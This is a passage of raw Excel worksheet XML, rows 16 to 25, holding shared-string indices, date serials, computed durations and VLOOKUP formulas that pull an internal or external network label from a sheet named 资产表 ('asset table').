      </c>
      <c r="AN16" s="10"/>
      <c r="AO16" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP16" s="10"/>
      <c r="AQ16" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR16" s="10"/>
      <c r="AS16" s="10"/>
      <c r="AT16" s="10"/>
      <c r="AU16" s="10"/>
      <c r="AV16" s="10"/>
      <c r="AW16" s="10"/>
      <c r="AX16" s="14"/>
      <c r="AY16" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ16" s="9">
        <f t="shared" si="0"/>
        <v>26.32</v>
      </c>
      <c r="BA16" s="9">
        <f t="shared" si="5"/>
        <v>13.52</v>
      </c>
      <c r="BB16" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC16" s="9">
        <f t="shared" si="3"/>
        <v>13.52</v>
      </c>
      <c r="BD16" s="9">
        <f t="shared" si="4"/>
        <v>13.52</v>
      </c>
    </row>
    <row r="17" s="1" customFormat="1" spans="1:56">
      <c r="A17" s="1" t="s">
        <v>289</v>
      </c>
      <c r="B17" s="2">
        <v>46052.4599421296</v>
      </c>
      <c r="C17" s="10" t="s">
        <v>11593</v>
      </c>
      <c r="D17" s="10" t="s">
        <v>10412</v>
      </c>
      <c r="E17" s="10" t="s">
        <v>3402</v>
      </c>
      <c r="F17" s="10" t="s">
        <v>11594</v>
      </c>
      <c r="G17" s="10" t="s">
        <v>3402</v>
      </c>
      <c r="H17" s="10"/>
      <c r="I17" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J17" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K17" s="10"/>
      <c r="L17" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M17" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N17" s="10" t="s">
        <v>171</v>
      </c>
      <c r="O17" s="12" t="s">
        <v>8400</v>
      </c>
      <c r="P17" s="10"/>
      <c r="Q17" s="10"/>
      <c r="R17" s="10"/>
      <c r="S17" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T17" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U17" s="10" t="s">
        <v>8622</v>
      </c>
      <c r="V17" s="13" t="s">
        <v>8432</v>
      </c>
      <c r="W17" s="10"/>
      <c r="X17" s="10" t="s">
        <v>11595</v>
      </c>
      <c r="Y17" s="10" t="s">
        <v>10414</v>
      </c>
      <c r="Z17" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA17" s="10"/>
      <c r="AB17" s="10" t="s">
        <v>3352</v>
      </c>
      <c r="AC17" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AD17" s="14">
        <v>46052.4591782407</v>
      </c>
      <c r="AE17" s="14">
        <v>46052.4610069444</v>
      </c>
      <c r="AF17" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AG17" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AH17" s="10"/>
      <c r="AI17" s="10"/>
      <c r="AJ17" s="10"/>
      <c r="AK17" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL17" s="10" t="s">
        <v>3402</v>
      </c>
      <c r="AM17" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN17" s="10"/>
      <c r="AO17" s="10" t="s">
        <v>8777</v>
      </c>
      <c r="AP17" s="10"/>
      <c r="AQ17" s="10" t="s">
        <v>11596</v>
      </c>
      <c r="AR17" s="10"/>
      <c r="AS17" s="10"/>
      <c r="AT17" s="10"/>
      <c r="AU17" s="10"/>
      <c r="AV17" s="10" t="s">
        <v>11597</v>
      </c>
      <c r="AW17" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX17" s="14">
        <v>46052.4610416667</v>
      </c>
      <c r="AY17" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ17" s="9">
        <f t="shared" si="0"/>
        <v>1.1</v>
      </c>
      <c r="BA17" s="9">
        <f t="shared" si="5"/>
        <v>1.58</v>
      </c>
      <c r="BB17" s="9">
        <f t="shared" si="2"/>
        <v>1.58</v>
      </c>
      <c r="BC17" s="9">
        <f t="shared" si="3"/>
        <v>44572.83</v>
      </c>
      <c r="BD17" s="9">
        <f t="shared" si="4"/>
        <v>44572.83</v>
      </c>
    </row>
    <row r="18" s="1" customFormat="1" spans="1:56">
      <c r="A18" s="1" t="s">
        <v>289</v>
      </c>
      <c r="B18" s="2">
        <v>46076.7486689815</v>
      </c>
      <c r="C18" s="10" t="s">
        <v>11598</v>
      </c>
      <c r="D18" s="10" t="s">
        <v>8633</v>
      </c>
      <c r="E18" s="10" t="s">
        <v>412</v>
      </c>
      <c r="F18" s="10" t="s">
        <v>11567</v>
      </c>
      <c r="G18" s="10" t="s">
        <v>1977</v>
      </c>
      <c r="H18" s="10"/>
      <c r="I18" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J18" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K18" s="10"/>
      <c r="L18" s="10"/>
      <c r="M18" s="10" t="s">
        <v>11569</v>
      </c>
      <c r="N18" s="10" t="s">
        <v>11599</v>
      </c>
      <c r="O18" s="12" t="s">
        <v>8400</v>
      </c>
      <c r="P18" s="10"/>
      <c r="Q18" s="10"/>
      <c r="R18" s="10"/>
      <c r="S18" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T18" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U18" s="10" t="s">
        <v>8992</v>
      </c>
      <c r="V18" s="13" t="s">
        <v>8432</v>
      </c>
      <c r="W18" s="10" t="s">
        <v>8431</v>
      </c>
      <c r="X18" s="10" t="s">
        <v>11600</v>
      </c>
      <c r="Y18" s="10" t="s">
        <v>9751</v>
      </c>
      <c r="Z18" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA18" s="10"/>
      <c r="AB18" s="10" t="s">
        <v>11601</v>
      </c>
      <c r="AC18" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AD18" s="14">
        <v>46076.7473958333</v>
      </c>
      <c r="AE18" s="14">
        <v>46076.752650463</v>
      </c>
      <c r="AF18" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AG18" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AH18" s="10"/>
      <c r="AI18" s="10"/>
      <c r="AJ18" s="10"/>
      <c r="AK18" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL18" s="10" t="s">
        <v>1977</v>
      </c>
      <c r="AM18" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN18" s="10"/>
      <c r="AO18" s="10" t="s">
        <v>8557</v>
      </c>
      <c r="AP18" s="10"/>
      <c r="AQ18" s="10" t="s">
        <v>11596</v>
      </c>
      <c r="AR18" s="10"/>
      <c r="AS18" s="10"/>
      <c r="AT18" s="10"/>
      <c r="AU18" s="10"/>
      <c r="AV18" s="10" t="s">
        <v>11597</v>
      </c>
      <c r="AW18" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX18" s="14">
        <v>46076.7524652778</v>
      </c>
      <c r="AY18" s="1" t="str">
        <f>VLOOKUP(E18,资产表!C:AG,31,0)</f>
        <v>内网</v>
      </c>
      <c r="AZ18" s="9">
        <f t="shared" si="0"/>
        <v>1.83</v>
      </c>
      <c r="BA18" s="9">
        <f t="shared" si="5"/>
        <v>5.47</v>
      </c>
      <c r="BB18" s="9">
        <f t="shared" si="2"/>
        <v>5.47</v>
      </c>
      <c r="BC18" s="9">
        <f t="shared" si="3"/>
        <v>9597.07</v>
      </c>
      <c r="BD18" s="9">
        <f t="shared" si="4"/>
        <v>9597.07</v>
      </c>
    </row>
    <row r="19" s="1" customFormat="1" spans="1:56">
      <c r="A19" s="1" t="s">
        <v>289</v>
      </c>
      <c r="B19" s="2">
        <v>46077.6402662037</v>
      </c>
      <c r="C19" s="10" t="s">
        <v>11593</v>
      </c>
      <c r="D19" s="10" t="s">
        <v>10007</v>
      </c>
      <c r="E19" s="10" t="s">
        <v>1238</v>
      </c>
      <c r="F19" s="10" t="s">
        <v>11594</v>
      </c>
      <c r="G19" s="10" t="s">
        <v>1238</v>
      </c>
      <c r="H19" s="10"/>
      <c r="I19" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J19" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K19" s="10"/>
      <c r="L19" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M19" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N19" s="10" t="s">
        <v>171</v>
      </c>
      <c r="O19" s="12" t="s">
        <v>8400</v>
      </c>
      <c r="P19" s="10"/>
      <c r="Q19" s="10"/>
      <c r="R19" s="10"/>
      <c r="S19" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T19" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U19" s="10" t="s">
        <v>8484</v>
      </c>
      <c r="V19" s="13" t="s">
        <v>8432</v>
      </c>
      <c r="W19" s="10"/>
      <c r="X19" s="10" t="s">
        <v>11602</v>
      </c>
      <c r="Y19" s="10" t="s">
        <v>10010</v>
      </c>
      <c r="Z19" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA19" s="10"/>
      <c r="AB19" s="10" t="s">
        <v>10011</v>
      </c>
      <c r="AC19" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AD19" s="14">
        <v>46077.6394560185</v>
      </c>
      <c r="AE19" s="14">
        <v>46077.6480208333</v>
      </c>
      <c r="AF19" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AG19" s="14">
        <v>46083.4132986111</v>
      </c>
      <c r="AH19" s="10"/>
      <c r="AI19" s="10"/>
      <c r="AJ19" s="10"/>
      <c r="AK19" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL19" s="10" t="s">
        <v>1238</v>
      </c>
      <c r="AM19" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN19" s="10"/>
      <c r="AO19" s="10" t="s">
        <v>8658</v>
      </c>
      <c r="AP19" s="10"/>
      <c r="AQ19" s="10" t="s">
        <v>11596</v>
      </c>
      <c r="AR19" s="10"/>
      <c r="AS19" s="10"/>
      <c r="AT19" s="10"/>
      <c r="AU19" s="10"/>
      <c r="AV19" s="10" t="s">
        <v>11597</v>
      </c>
      <c r="AW19" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX19" s="14">
        <v>46077.647974537</v>
      </c>
      <c r="AY19" s="1" t="str">
        <f>VLOOKUP(E19,资产表!C:AG,31,0)</f>
        <v>内网</v>
      </c>
      <c r="AZ19" s="9">
        <f t="shared" si="0"/>
        <v>1.17</v>
      </c>
      <c r="BA19" s="9">
        <f t="shared" si="5"/>
        <v>11.1</v>
      </c>
      <c r="BB19" s="9">
        <f t="shared" si="2"/>
        <v>11.1</v>
      </c>
      <c r="BC19" s="9">
        <f t="shared" si="3"/>
        <v>8313.17</v>
      </c>
      <c r="BD19" s="9">
        <f t="shared" si="4"/>
        <v>8313.17</v>
      </c>
    </row>
    <row r="20" s="1" customFormat="1" spans="1:56">
      <c r="A20" s="1" t="s">
        <v>265</v>
      </c>
      <c r="B20" s="2">
        <v>45985.3865509259</v>
      </c>
      <c r="C20" s="10" t="s">
        <v>11603</v>
      </c>
      <c r="D20" s="10" t="s">
        <v>8376</v>
      </c>
      <c r="E20" s="10" t="s">
        <v>3453</v>
      </c>
      <c r="F20" s="10" t="s">
        <v>11604</v>
      </c>
      <c r="G20" s="10" t="s">
        <v>10911</v>
      </c>
      <c r="H20" s="10"/>
      <c r="I20" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J20" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K20" s="10"/>
      <c r="L20" s="10"/>
      <c r="M20" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N20" s="10" t="s">
        <v>11605</v>
      </c>
      <c r="O20" s="16" t="s">
        <v>8400</v>
      </c>
      <c r="P20" s="10"/>
      <c r="Q20" s="10"/>
      <c r="R20" s="10"/>
      <c r="S20" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T20" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U20" s="10" t="s">
        <v>8461</v>
      </c>
      <c r="V20" s="16" t="s">
        <v>8377</v>
      </c>
      <c r="W20" s="10" t="s">
        <v>11606</v>
      </c>
      <c r="X20" s="10"/>
      <c r="Y20" s="10" t="s">
        <v>10910</v>
      </c>
      <c r="Z20" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA20" s="10"/>
      <c r="AB20" s="10" t="s">
        <v>3453</v>
      </c>
      <c r="AC20" s="14">
        <v>46002.7697453704</v>
      </c>
      <c r="AD20" s="14">
        <v>45985.3862152778</v>
      </c>
      <c r="AE20" s="14">
        <v>45985.3877662037</v>
      </c>
      <c r="AF20" s="14">
        <v>46002.7697453704</v>
      </c>
      <c r="AG20" s="14">
        <v>46002.7697453704</v>
      </c>
      <c r="AH20" s="10"/>
      <c r="AI20" s="10"/>
      <c r="AJ20" s="10" t="s">
        <v>8637</v>
      </c>
      <c r="AK20" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL20" s="10" t="s">
        <v>10908</v>
      </c>
      <c r="AM20" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN20" s="10"/>
      <c r="AO20" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="AP20" s="10"/>
      <c r="AQ20" s="10" t="s">
        <v>11607</v>
      </c>
      <c r="AR20" s="10"/>
      <c r="AS20" s="10"/>
      <c r="AT20" s="10"/>
      <c r="AU20" s="10"/>
      <c r="AV20" s="10" t="s">
        <v>11608</v>
      </c>
      <c r="AW20" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX20" s="14">
        <v>45985.3899421296</v>
      </c>
      <c r="AY20" s="1" t="str">
        <f>VLOOKUP(E20,资产表!C:AG,31,0)</f>
        <v>内网</v>
      </c>
      <c r="AZ20" s="9">
        <f t="shared" si="0"/>
        <v>0.48</v>
      </c>
      <c r="BA20" s="9">
        <f t="shared" si="5"/>
        <v>4.88</v>
      </c>
      <c r="BB20" s="9">
        <f t="shared" si="2"/>
        <v>4.88</v>
      </c>
      <c r="BC20" s="9">
        <f t="shared" si="3"/>
        <v>25031.8</v>
      </c>
      <c r="BD20" s="9">
        <f t="shared" si="4"/>
        <v>25031.8</v>
      </c>
    </row>
    <row r="21" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A21" s="1" t="s">
        <v>265</v>
      </c>
      <c r="B21" s="2">
        <v>45880.4008564815</v>
      </c>
      <c r="C21" s="10" t="s">
        <v>11603</v>
      </c>
      <c r="D21" s="10" t="s">
        <v>8376</v>
      </c>
      <c r="E21" s="10" t="s">
        <v>3612</v>
      </c>
      <c r="F21" s="10" t="s">
        <v>11576</v>
      </c>
      <c r="G21" s="10" t="s">
        <v>11467</v>
      </c>
      <c r="H21" s="10"/>
      <c r="I21" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J21" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K21" s="10"/>
      <c r="L21" s="10"/>
      <c r="M21" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N21" s="10" t="s">
        <v>11605</v>
      </c>
      <c r="O21" s="16" t="s">
        <v>8400</v>
      </c>
      <c r="P21" s="10"/>
      <c r="Q21" s="10"/>
      <c r="R21" s="10"/>
      <c r="S21" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T21" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U21" s="10" t="s">
        <v>8389</v>
      </c>
      <c r="V21" s="16" t="s">
        <v>8400</v>
      </c>
      <c r="W21" s="10" t="s">
        <v>11609</v>
      </c>
      <c r="X21" s="10"/>
      <c r="Y21" s="10" t="s">
        <v>11466</v>
      </c>
      <c r="Z21" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA21" s="10"/>
      <c r="AB21" s="10" t="s">
        <v>3612</v>
      </c>
      <c r="AC21" s="14">
        <v>45880.4727662037</v>
      </c>
      <c r="AD21" s="14">
        <v>45880.3985416667</v>
      </c>
      <c r="AE21" s="14">
        <v>45880.403599537</v>
      </c>
      <c r="AF21" s="14">
        <v>45880.4727662037</v>
      </c>
      <c r="AG21" s="14">
        <v>45880.4727662037</v>
      </c>
      <c r="AH21" s="10"/>
      <c r="AI21" s="10"/>
      <c r="AJ21" s="10" t="s">
        <v>8637</v>
      </c>
      <c r="AK21" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL21" s="10" t="s">
        <v>11465</v>
      </c>
      <c r="AM21" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN21" s="10"/>
      <c r="AO21" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="AP21" s="10"/>
      <c r="AQ21" s="10" t="s">
        <v>11610</v>
      </c>
      <c r="AR21" s="10"/>
      <c r="AS21" s="10"/>
      <c r="AT21" s="10"/>
      <c r="AU21" s="10"/>
      <c r="AV21" s="10" t="s">
        <v>11611</v>
      </c>
      <c r="AW21" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX21" s="14">
        <v>45880.4036111111</v>
      </c>
      <c r="AY21" s="1" t="str">
        <f>VLOOKUP(E21,资产表!C:AG,31,0)</f>
        <v>外网</v>
      </c>
      <c r="AZ21" s="9">
        <f t="shared" si="0"/>
        <v>3.33</v>
      </c>
      <c r="BA21" s="9">
        <f t="shared" si="5"/>
        <v>3.97</v>
      </c>
      <c r="BB21" s="9">
        <f t="shared" si="2"/>
        <v>3.97</v>
      </c>
      <c r="BC21" s="9">
        <f t="shared" si="3"/>
        <v>103.55</v>
      </c>
      <c r="BD21" s="9">
        <f t="shared" si="4"/>
        <v>103.55</v>
      </c>
    </row>
    <row r="22" s="1" customFormat="1" spans="1:56">
      <c r="A22" s="1" t="s">
        <v>265</v>
      </c>
      <c r="B22" s="2">
        <v>45958.7312037037</v>
      </c>
      <c r="C22" s="10" t="s">
        <v>11612</v>
      </c>
      <c r="D22" s="10" t="s">
        <v>8944</v>
      </c>
      <c r="E22" s="10" t="s">
        <v>1627</v>
      </c>
      <c r="F22" s="10" t="s">
        <v>11575</v>
      </c>
      <c r="G22" s="10" t="s">
        <v>11007</v>
      </c>
      <c r="H22" s="10"/>
      <c r="I22" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J22" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K22" s="10"/>
      <c r="L22" s="10"/>
      <c r="M22" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N22" s="10" t="s">
        <v>11613</v>
      </c>
      <c r="O22" s="15" t="s">
        <v>8377</v>
      </c>
      <c r="P22" s="10"/>
      <c r="Q22" s="10"/>
      <c r="R22" s="10"/>
      <c r="S22" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T22" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U22" s="10" t="s">
        <v>11089</v>
      </c>
      <c r="V22" s="17" t="s">
        <v>8400</v>
      </c>
      <c r="W22" s="10" t="s">
        <v>11606</v>
      </c>
      <c r="X22" s="10"/>
      <c r="Y22" s="10" t="s">
        <v>11008</v>
      </c>
      <c r="Z22" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA22" s="10"/>
      <c r="AB22" s="10" t="s">
        <v>11614</v>
      </c>
      <c r="AC22" s="14">
        <v>46002.7697453704</v>
      </c>
      <c r="AD22" s="14">
        <v>45958.7310648148</v>
      </c>
      <c r="AE22" s="14">
        <v>45958.7324305556</v>
      </c>
      <c r="AF22" s="14">
        <v>46002.7697453704</v>
      </c>
      <c r="AG22" s="14">
        <v>46002.7697453704</v>
      </c>
      <c r="AH22" s="10"/>
      <c r="AI22" s="10"/>
      <c r="AJ22" s="10" t="s">
        <v>8637</v>
      </c>
      <c r="AK22" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL22" s="10" t="s">
        <v>11615</v>
      </c>
      <c r="AM22" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN22" s="10"/>
      <c r="AO22" s="10" t="s">
        <v>8658</v>
      </c>
      <c r="AP22" s="10"/>
      <c r="AQ22" s="10" t="s">
        <v>11607</v>
      </c>
      <c r="AR22" s="10"/>
      <c r="AS22" s="10"/>
      <c r="AT22" s="10"/>
      <c r="AU22" s="10"/>
      <c r="AV22" s="10" t="s">
        <v>11608</v>
      </c>
      <c r="AW22" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX22" s="14">
        <v>45958.7324305556</v>
      </c>
      <c r="AY22" s="1" t="str">
        <f>VLOOKUP(E22,资产表!C:AG,31,0)</f>
        <v>外网</v>
      </c>
      <c r="AZ22" s="9">
        <f t="shared" si="0"/>
        <v>0.2</v>
      </c>
      <c r="BA22" s="9">
        <f t="shared" si="5"/>
        <v>1.77</v>
      </c>
      <c r="BB22" s="9">
        <f t="shared" si="2"/>
        <v>1.77</v>
      </c>
      <c r="BC22" s="9">
        <f t="shared" si="3"/>
        <v>63415.5</v>
      </c>
      <c r="BD22" s="9">
        <f t="shared" si="4"/>
        <v>63415.5</v>
      </c>
    </row>
    <row r="23" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A23" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B23" s="2">
        <v>45875.0655092593</v>
      </c>
      <c r="C23" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D23" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E23" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F23" s="10" t="s">
        <v>11594</v>
      </c>
      <c r="G23" s="10"/>
      <c r="H23" s="10"/>
      <c r="I23" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J23" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K23" s="10"/>
      <c r="L23" s="10"/>
      <c r="M23" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N23" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O23" s="16" t="s">
        <v>8432</v>
      </c>
      <c r="P23" s="10"/>
      <c r="Q23" s="10"/>
      <c r="R23" s="10"/>
      <c r="S23" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T23" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U23" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V23" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W23" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X23" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y23" s="10" t="s">
        <v>11481</v>
      </c>
      <c r="Z23" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA23" s="10"/>
      <c r="AB23" s="10"/>
      <c r="AC23" s="14">
        <v>45875.0655208333</v>
      </c>
      <c r="AD23" s="14">
        <v>45875.0620949074</v>
      </c>
      <c r="AE23" s="14"/>
      <c r="AF23" s="14"/>
      <c r="AG23" s="14"/>
      <c r="AH23" s="10"/>
      <c r="AI23" s="10"/>
      <c r="AJ23" s="10"/>
      <c r="AK23" s="10"/>
      <c r="AL23" s="10"/>
      <c r="AM23" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN23" s="10"/>
      <c r="AO23" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP23" s="10"/>
      <c r="AQ23" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR23" s="10"/>
      <c r="AS23" s="10"/>
      <c r="AT23" s="10"/>
      <c r="AU23" s="10"/>
      <c r="AV23" s="10"/>
      <c r="AW23" s="10"/>
      <c r="AX23" s="14"/>
      <c r="AY23" s="1" t="e">
        <f>VLOOKUP(E23,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ23" s="9">
        <f t="shared" si="0"/>
        <v>4.92</v>
      </c>
      <c r="BA23" s="9">
        <f t="shared" si="5"/>
        <v>0.02</v>
      </c>
      <c r="BB23" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC23" s="9">
        <f t="shared" si="3"/>
        <v>0.02</v>
      </c>
      <c r="BD23" s="9">
        <f t="shared" si="4"/>
        <v>0.02</v>
      </c>
    </row>
    <row r="24" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A24" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B24" s="2">
        <v>45875.0667361111</v>
      </c>
      <c r="C24" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D24" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E24" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F24" s="10" t="s">
        <v>11574</v>
      </c>
      <c r="G24" s="10"/>
      <c r="H24" s="10"/>
      <c r="I24" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J24" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K24" s="10"/>
      <c r="L24" s="10"/>
      <c r="M24" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N24" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O24" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P24" s="10"/>
      <c r="Q24" s="10"/>
      <c r="R24" s="10"/>
      <c r="S24" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T24" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U24" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V24" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W24" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X24" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y24" s="10" t="s">
        <v>11479</v>
      </c>
      <c r="Z24" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA24" s="10"/>
      <c r="AB24" s="10"/>
      <c r="AC24" s="14">
        <v>45875.0667361111</v>
      </c>
      <c r="AD24" s="14">
        <v>45875.0635648148</v>
      </c>
      <c r="AE24" s="14"/>
      <c r="AF24" s="14"/>
      <c r="AG24" s="14"/>
      <c r="AH24" s="10"/>
      <c r="AI24" s="10"/>
      <c r="AJ24" s="10"/>
      <c r="AK24" s="10"/>
      <c r="AL24" s="10"/>
      <c r="AM24" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN24" s="10"/>
      <c r="AO24" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP24" s="10"/>
      <c r="AQ24" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR24" s="10"/>
      <c r="AS24" s="10"/>
      <c r="AT24" s="10"/>
      <c r="AU24" s="10"/>
      <c r="AV24" s="10"/>
      <c r="AW24" s="10"/>
      <c r="AX24" s="14"/>
      <c r="AY24" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ24" s="9">
        <f t="shared" si="0"/>
        <v>4.57</v>
      </c>
      <c r="BA24" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB24" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC24" s="9">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BD24" s="9">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A25" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B25" s="2">
        <v>45883.5282638889</v>
      </c>
      <c r="C25" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D25" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E25" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F25" s="10" t="s">
        <v>11591</v>
      </c>
      <c r="G25" s="10"/>
      <c r="H25" s="10"/>
      <c r="I25" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J25" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K25" s="10"/>
      <c r="L25" s="10"/>
      <c r="M25" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N25" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O25" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P25" s="10"/>
      <c r="Q25" s="10"/>
      <c r="R25" s="10"/>
      <c r="S25" s="10" t="s">
        <v>10527</v>
      </c>
      <c r="T25" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U25" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V25" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W25" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X25" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y25" s="10" t="s">
        <v>11451</v>
      </c>
      <c r="Z25" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA25" s="10"/>
      <c r="AB25" s="10"/>
      <c r="AC25" s="14">
        <v>45883.5282638889</v>
      </c>
      <c r="AD25" s="14">
        <v>45883.5255092593</v>
      </c>
      <c r="AE25" s="14"/>
      <c r="AF25" s="14"/>
      <c r="AG25" s="14"/>
      <c r="AH25" s="10"/>
      <c r="AI25" s="10"/>
      <c r="AJ25" s="10"/>
      <c r="AK25" s="10"/>
      <c r="AL25" s="10"/>
      <c r="AM25" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN25" s="10"/>
      <c r="AO25" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP25" s="10"/>
      <c r="AQ25" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR25" s="10"/>
      <c r="AS25" s="10"/>
      <c r="AT25" s="10"/>
      <c r="AU25" s="10"/>
      <c r="AV25" s="10"/>
      <c r="AW25" s="10"/>
      <c r="AX25" s="14"/>
      <c r="AY25" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ25" s="9">
        <f t="shared" si="0"/>
        <v>3.97</v>
      </c>
      <c r="BA25" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB25" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC25" s="9">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
